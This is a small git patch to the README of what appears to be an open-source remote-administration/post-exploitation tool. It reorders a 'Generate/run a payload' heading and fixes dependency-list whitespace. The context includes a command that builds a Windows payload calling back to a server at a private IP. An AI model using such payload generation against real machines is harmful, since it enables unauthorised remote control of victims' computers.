From bba9c1a71395d271e99d5abb29fd489a4d2a0f0b Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Sun, 11 Oct 2015 18:12:23 +0200 Subject: [PATCH] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index be578b78..7abf60b9 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ pip install pefile ####Troubleshooting: If you have some issues with rpyc while running the server on windows, take a look at issue #25, @deathfantasy made a fix +### Generate/run a payload In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1 The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) -### Generate/run a payload #### for Windows ```bash ./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe @@ -149,8 +149,8 @@ positional arguments: ``` ## Dependencies -rpyc (https://github.com/tomerfiliba/rpyc) -pefile +rpyc (https://github.com/tomerfiliba/rpyc) +pefile ##Roadmap and ideas Some ideas without any priority order